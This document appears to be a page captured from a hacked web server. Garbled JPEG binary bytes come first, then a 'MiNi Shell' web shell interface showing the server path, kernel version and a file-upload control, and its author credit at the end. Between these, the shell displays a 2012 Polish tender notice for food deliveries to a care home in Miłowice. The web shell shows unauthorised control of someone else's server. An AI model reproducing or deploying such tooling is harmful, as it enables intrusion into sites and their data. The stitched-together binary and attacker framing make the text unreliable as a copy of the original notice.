JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120124/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120124/20799-N-2012.html

<p class="kh_header"><b>Żary: przetarg na
dostawę artykułów żywnościowych do Domu Pomocy Społecznej w 
Miłowicach z podziałem na zadania</b><br>
<b>Numer ogłoszenia: 20799 - 2012; data zamieszczenia: 24.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Miłowicach , Miłowice 26, 68-200 Żary, woj. lubuskie, tel. 0-68 374-38-22, faks 0-68 374-38-22.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dps-milowice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przetarg na
dostawę artykułów żywnościowych do Domu Pomocy Społecznej w 
Miłowicach z podziałem na zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie1. Dostawa mięsa, wyrobów mięsnych, wędlin i drobiu 

Lp.	Nazwa towaru	Nr wg CPV	Jedn.
miary	Ilość
( w skali roku)
1.	Antrykot zk	151	Kg	150
2.	Boczek surowy	151	Kg	180
3.	Słonina	151	Kg	70
4.	Karkówka bez kości	151	Kg	370
5	Łopatka bez kości	151	Kg	600
6.	Mielonka klopsowa 	151	Kg	40
7.	Wątróbka wieprzowa	151	Kg	100
8.	Filet z piersi kurczaka	151	Kg	170
9.	Kurczaki	151	Kg	1.300
10.	Udka z kurczaka	151	Kg	320
11.	Wątróbka drobiowa	151	Kg	120
12.	Żołądki drobiowe	151	Kg	70
13.	Kaszanka	151	Kg	200
14.	Pasztetowa drobiowa	151	Kg	70
15.	Salceson włoski	151	Kg	90
16.	Boczek faszerowany	151	Kg	120
17.	Baleron	151	Kg	20
18.	Kiełbasa śląska	151	Kg	300
19.	Kiełbasa zwyczajna	151	Kg	60
20.	Kiełbasa biała parzona	151	Kg	170
21.	Metka łososiowa	151	Kg	40
22.	Mielonka kanapkowa	151	Kg	150
23.	Mortadela drobiowa	151	Kg	120
24.	Ogonówka	151	Kg	110
25.	Polędwica drobiowa	151	Kg	100
26.	Parówki drobiowe	151	Kg	340
27.	Rolada drobiowa	151 	kg	80
28.	Szynka gotowana	151	kg	50
29.	Schab bez kości	151	kg	60
30.	Szynka wiejska	151	kg	40
31.	Flaki wołowe	151	kg	30
32.	Polędwica Sopocka	151	kg	60
33.	Kiełbasa krakowska	151	kg	100
34.	Szynka tyrolska	151	kg	40
35.	Wołowina extra	151	kg	10
Zadanie 2. Dostawa warzyw i owoców mrożonych
1.	Brokuły mrożone	153	Kg	200
2.	Brukselka mrożona	153	Kg	90
3.	Kalafior mrożony	153	Kg	240
4.	Mieszanka kompotowa	153	Kg	880
6.	Marchewka z groszkiem	153	Kg	200
Zadanie 3. Dostawa dżemów, marmolady, warzyw i owoców przetworzonych

1.	Ćwikła z chrzanem	153	szt	40
2.	Dżemy owocowe 	153	kg	100
3.	Fasolka szparagowa konserwowa  470 g	153	szt	800
4.	Groszek konserwowy 400 g	153	szt	400
5.	Przecier jabłkowy ( 960 g) 	153	Szt.	190
6.	Koncentrat pomidorowy  (1 kg )
Pudliszki	153	szt	60
7.	Kukurydza konserwowa ( 400 g)	153	szt	160
8.	Miód naturalny  ( 380 g)	153	Szt 	80
9.	Ogórki konserwowe ( 900g)	153	szt	560
10.	Przecier ogórkowy ( 900g)	153	szt	170
11.	Papryka konserwowa ( 900g)	153	szt	150
12.	Sałatka wielowarzywna  ( 900 g)	153	szt	600
13.	Szczaw konserwowy ( 900 g)	153	szt	50
Zadanie 4. Dostawa mleka i artykułów nabiałowych pochodzenia roślinnego

Lp.	Nazwa towaru	Nr wg CPV	Jedn.
miary	Ilość
( w skali roku)
1.	Jogurty naturalne  400 g	155	Szt	350
2.	Jogurty owocowe  150g	155	Szt	6.680
3.	Margaryna zwykła	155	kg	500
4.	Masło extra  82 %   200g	155	Kg	950
5.	Mleko w folii 2%	155	Litr	9.010
6.	Margaryna do smarowania	155	Kg	90
7.	Mleko w proszku 	155	Kg	20
8.	Olej	155	L	780
9.	Ser topiony	155	Kg	95
10.	Śmietana 18 %	155	L	1000
11.	Ser żółty	155	Kg	310
12.	Twarożek  kanapkowy  200 g	154	szt	1300
13.	Serek wiejski  200 g	154	Szt	980
14.
	Twaróg półtłusty
	154
	Kg	400

15.	Jogurty naturalne  ( 180 g )	154	szt	500
Zadanie 5. Dostawa pieczywa

Lp.	Nazwa towaru	Nr wg CPV	Jedn.
miary	Ilość
( w skali roku)
1.	Chleb zwykły krojony Baltonowski	158	Szt	3.800
2.	Chleb pszenny krojony	158	Szt	450
3.	Chleb wieloziarnisty krojony	158	Szt	1.800
4.	Bułki zwykłe duże	158	Szt	3.000
5.	Bułka tarta	158	Kg	150
6.	Pączki
	158
	szt
	200
7.	Ciasta różne ( sernik. biszkoptowe, orzechowiec)	158	kg	160

Zadanie 6. Dostawa artykułów mącznych, przypraw i dodatków suchych

Lp.	Nazwa towaru	Nr wg CPV	Jedn.
miary	Ilość
( w skali roku)
1.	Koperek suszony	156	szt	30
2.	Maga w płynie	156	L	60
3.	Majeranek 	156	szt	40
4.	Przyprawa gyros 	156	szt	80
5.	Przyprawa do ryb 	156	szt	20
6.	Papryka mielona słodka (20g)	156	szt	200
7.	Pieprz mielony 	156	kg	20
8.	Warzywko - przyprawa	156	kg	110
9.	Ziele angielskie 	156	szt	30
10.	Barszcz biały Winiary158	kg	11
11.	Cukierki mieszanka 	158	kg	20 
12. 	Cukier waniliowy	158	Szt	65
13.	Cukier puder	158	Kg	30
14.	Czosnek suszony  granulowany	158	szt	150
15.	Cukier kryształ	158	Kg	2000
16.	Ciastka kruche	158	kg	270
17.	Galaretki owocowe	158	Szt	60
18.	Herbata  granulowana  100 g	158	Szt	1450
19.	Kawa Inka 150 g	158	szt	290
20.	Kakao 100 g	158	szt	250
21.	Kisiele owocowe (40g)	158	szt	910
22.	Ketchup  łagodny 500g	158	szt	130
23.	Konserwy mięsne  300 g	158	szt	540
24.	Kasza manna	158	Kg	155
25.	Zupa pieczarkowa Winiary158	kg	30
26.	Otręby pszenne	158	szt	70
27.	Żurek  Winiary158	kg	40
28	Sól spożywcza	158	kg	280
29.	Kasza jęczmienna 	158	kg	50
30.	Mąka tortowa	158	Kg	160
31.	Mąka pszenna	158	kg	90
32.	Mąka ziemniaczana	158	kg	50
33.	Makaron nitki  Abak	158	kg	400
34.	Makaron świderki  Abak158	kg	400
35.	Musztarda ( 200g )	158	szt	450
36.	Ocet 	158	l	30
37.	Pasztet drobiowy  (135g)	158	szt	1.500
38.	Płatki kukurydziane	158	kg	160
39.	Płatki owsiane	158	szt	70
40.	Proszek do pieczenia 	158	szt	60
41.	Ryż	158	Kg	300
42.	Rodzynki  (400g)	158	szt	20
43.	Majonez ( 700ml) Winiary158	szt	230
44.	Herbata Expresowa Lipton (100 szt )	158	Op.	5
45.	Kawa rozpuszczalna Nescafe ( 200g)	158	szt	10
Zadanie 7. Dostawa ryb i przetworów rybnych

Lp.	Nazwa towaru	Nr wg CPV	Jedn.
miary	Ilość
( w skali roku)
1.	Filet  Mintaj mrożony  0 % glazury	152	Kg	480
2.	Tuńczyk w sosie własnym 185g	152	szt	200
3.	Paprykarz szczeciński  300g	152	Szt	30
4.	Szproty w pomidorach  330g	152	Szt	100
5.	Filety śledziowe Matjas	152	Kg	130
6.	Ryba wędzona  Makrela	152	Kg	40


Zadanie 8. Dostawa jaj

Lp.	Nazwa towaru	Nr wg CPV	Jedn.
miary	Ilość
( w skali roku)
1.	Jajka  M 124	Szt	17.500.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- aktualny odpis z właściwego rejestru sądowego albo aktualne 
zaświadczenie o wpisie do ewidencji gospodarczej , wystawione nie wcześniej 
niż 6 miesięcy przed upływem terminu składania ofert
- parafowany na każdej stronie wzór umowy
- wypełniony formularz ofertowy
-wypełnione oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dps-milowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Miłowicach, Miłowice 26.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.02.2012 godzina 10:00, miejsce: Dom Pomocy Społecznej w Miłowicach, Miłowice 26  -gabinet Dyrektora.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com